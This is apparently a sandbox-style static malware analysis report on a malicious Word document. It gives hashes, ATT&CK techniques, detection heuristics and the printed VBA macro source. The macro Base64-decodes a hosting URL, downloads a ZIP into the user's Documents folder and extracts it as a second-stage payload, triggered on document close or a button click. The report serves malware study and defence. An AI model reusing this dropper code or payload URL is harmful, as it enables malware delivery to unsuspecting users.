Malicious Office (OOXML) — malware analysis report

Static analysis result for SHA-256 f7ea559bc44089a8…

MALICIOUS

Office (OOXML)

614.8 KB Created: 2021-02-24 13:52:00 UTC Authoring application: Microsoft Office Word 16.0000 First seen: 2022-06-20
MD5: 75b31619aa27eef3891b03918c04547a SHA-1: 3d382000bd68f22c3a5c705447afde95639b1009 SHA-256: f7ea559bc44089a806d42de01b0a5087330e4b84a0b692f74d9b7272410e9c8d
250 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1105 Ingress Tool Transfer T1204.002 Malicious File

The sample contains VBA macros that execute upon opening the document, as indicated by the Document_Open macro and WScript.Shell usage. The script decodes and downloads a ZIP file from the URL https://kithuatphanmem.000webhostapp.com/chare/test.zip, saves it to the user's Documents folder, and then extracts its contents. This indicates an attempt to download and execute a second-stage payload.

Heuristics 8

  • VBA project inside OOXML medium 5 related findings OOXML_VBA
    Document contains a VBA project — VBA macros present
  • WScript.Shell usage critical OLE_VBA_WSCRIPT
    WScript.Shell usage
    Matched line in script
        Set oShell = CreateObject("WScript.Shell")
  • VBA Base64-decoded Shell command stager critical OLE_VBA_BASE64_SHELL_COMMAND_STAGER
    VBA auto-exec macro decodes Base64 string literals into command or script-launch text and executes the result with Shell. This catches cmd/cscript/PowerShell/VBS launchers hidden from plain keyword matching.
    Matched line in script
        Set objWinHttp = CreateObject("WinHttp.WinHttpRequest.5.1")
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
    Matched line in script
        Set objWinHttp = CreateObject("WinHttp.WinHttpRequest.5.1")
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Triggers on the COMBINATION of two tokens co-occurring in the same compiled VBA/cache stream: an auto-execution entry point (Auto_Open / AutoOpen / Document_Open / Workbook_Open / Auto_Close / AutoClose) AND a shell/download/object-execution token (Shell, CreateObject, GetObject, PowerShell, cmd.exe, URLDownloadToFile, WinHttp, XMLHTTP, ADODB.Stream, ShellExecute, ExecuteExcel4Macro). Neither token alone fires it — it is the pairing that flags p-code-only or source-extraction-failure macro documents where the visible VBA source is unavailable. The matched tokens are named in the detail line below.
  • Document_Open macro low OLE_VBA_DOCOPEN
    Document_Open macro
    Matched line in script
    Private Sub Document_Open()
  • Macro/content-enable lure medium SE_ENABLE_LURE
    Document instructs the user to enable macros or editing — a common technique used by malware droppers to bypass Office macro security settings
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://Motobit.cz In document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingCanvasIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2014/chartexIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2015/9/8/chartexIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2015/10/21/chartexIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2016/5/9/chartexIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2016/5/10/chartexIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2016/5/11/chartexIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2016/5/12/chartexIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2016/5/13/chartexIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2016/5/14/chartexIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/markup-compatibility/2006In document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2016/inkIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2017/model3dIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/officeDocument/2006/relationshipsIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/officeDocument/2006/mathIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingDrawingIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawingIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/wordprocessingml/2006/mainIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordmlIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2012/wordmlIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2018/wordml/cexIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2016/wordml/cidIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2018/wordmlIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2015/wordml/symexIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingGroupIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingInkIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2006/wordmlIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingShapeIn document text (OOXML body / shared strings)
    • https://kithuatphanmem.000webhostapp.com/chare/test.zipReferenced by macro

Extracted artifacts 2

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source from OOXML) 4776 bytes
SHA-256: 51b1ae2727b2c1ea49bc77afd7ab59dfb2283c4ce1d72927875f90d9e5321a6b
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Control = "CommandButton1, 0, 0, MSForms, CommandButton"
Function SaveBinaryData(FileName, Data)

' adTypeText for binary = 1
Const adTypeText = 1
Const adSaveCreateOverWrite = 2

' Create Stream object
Dim BinaryStream

' Specify stream type - we want To save Data/string data.

End Function

Function abcRun()
    Set objWinHttp = CreateObject("WinHttp.WinHttpRequest.5.1")
    Set oShell = CreateObject("WScript.Shell")
    User = oShell.ExpandEnvironmentStrings("%USERNAME%")
    URL = Base64Decode("aHR0cHM6Ly9raXRodWF0cGhhbm1lbS4wMDB3ZWJob3N0YXBwLmNvbS9jaGFyZS90ZXN0LnppcA==")
    Dim FSO
    Set FSO = CreateObject("Scripting.FileSystemObject")
    If FSO.FileExists(Base64Decode("QzpcVXNlcnNc") & User & Base64Decode("XERvY3VtZW50c1x0ZXN0LnppcA==")) = False Then
        objWinHttp.Open "GET", URL, False
        objWinHttp.send ""
        SaveBinaryData Base64Decode("QzpcVXNlcnNc") & User & Base64Decode("XERvY3VtZW50c1x0ZXN0LnppcA=="), objWinHttp.responseBody
        ZipFile = Base64Decode("QzpcVXNlcnNc") & User & Base64Decode("XERvY3VtZW50c1x0ZXN0LnppcA==")
        ExtractTo = Base64Decode("QzpcVXNlcnNc") & User & Base64Decode("XERvY3VtZW50c1xUZXN0XA==")
        If Not FSO.FolderExists(ExtractTo) Then
           FSO.CreateFolder (ExtractTo)
        End If
        Set objShell = CreateObject("Shell.Application")
        Set FilesInZip = objShell.NameSpace(ZipFile).items
        objShell.NameSpace(ExtractTo).CopyHere (FilesInZip)
    End If
    Set FSO = Nothing
    Set objShell = Nothing
End Function


Sub MakeImageInvisible(img)
Set objWord = CreateObject("Word.Application")
Application.ActiveDocument.InlineShapes.AddPicture _
                 img, False, True
End Sub


Private Sub CommandButton1_Click()
abcRun
End Sub


Private Sub Document_Close()
abcRun
End Sub

Function Base64Decode(ByVal base64String)
  'rfc1521
  '1999 Antonin Foller, Motobit Software, http://Motobit.cz
  Const Base64 = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/"
  Dim dataLength, sOut, groupBegin
  
  'remove white spaces, If any
  base64String = Replace(base64String, vbCrLf, "")
  base64String = Replace(base64String, vbTab, "")
  base64String = Replace(base64String, " ", "")
  
  'The source must consists from groups with Len of 4 chars
  dataLength = Len(base64String)
  If dataLength Mod 4 <> 0 Then
    Err.Raise 1, "Base64Decode", "Bad Base64 string."
    Exit Function
  End If

  
  ' Now decode each group:
  For groupBegin = 1 To dataLength Step 4
    Dim numDataBytes, CharCounter, thisChar, thisData, nGroup, pOut
    ' Each data group encodes up To 3 actual bytes.
    numDataBytes = 3
    nGroup = 0

    For CharCounter = 0 To 3
      ' Convert each character into 6 bits of data, And add it To
      ' an integer For temporary storage.  If a character is a '=', there
      ' is one fewer data byte.  (There can only be a maximum of 2 '=' In
      ' the whole string.)

      thisChar = Mid(base64String, groupBegin + CharCounter, 1)

      If thisChar = "=" Then
        numDataBytes = numDataBytes - 1
        thisData = 0
      Else
        thisData = InStr(1, Base64, thisChar, vbBinaryCompare) - 1
      End If
      If thisData = -1 Then
        Err.Raise 2, "Base64Decode", "Bad character In Base64 string."
        Exit Function
      End If

      nGroup = 64 * nGroup + thisData
    Next
    
    'Hex splits the long To 6 groups with 4 bits
    nGroup = Hex(nGroup)
    
    'Add leading zeros
    nGroup = String(6 - Len(nGroup), "0") & nGroup
    
    'Convert the 3 byte hex integer (6 chars) To 3 characters
    pOut = Chr(CByte("&H" & Mid(nGroup, 1, 2))) + _
      Chr(CByte("&H" & Mid(nGroup, 3, 2))) + _
      Chr(CByte("&H" & Mid(nGroup, 5, 2)))
    
    'add numDataBytes characters To out string
    sOut = sOut & Left(pOut, numDataBytes)
  Next

  Base64Decode = sOut
End Function


Private Sub Document_Open()

End Sub



Attribute VB_Name = "UserForm1"
Attribute VB_Base = "0{82AB64B0-D35B-4B18-8F32-94D8B5135F6D}{C9BB0F70-3A3D-487D-A3F4-BA2123D2CAD1}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Private Sub CommandButton1_Click()
Application.Visible = True
End Sub

Private Sub Label1_Click()

End Sub
vbaProject_00.bin vba-project OOXML VBA project: word/vbaProject.bin 39936 bytes
SHA-256: e7be17e655ce802a4ef9c510c4c564b4d268869e2270645b17d8e1f7f86e0ac0

Open this report in the interactive analyzer, or submit your own file for analysis.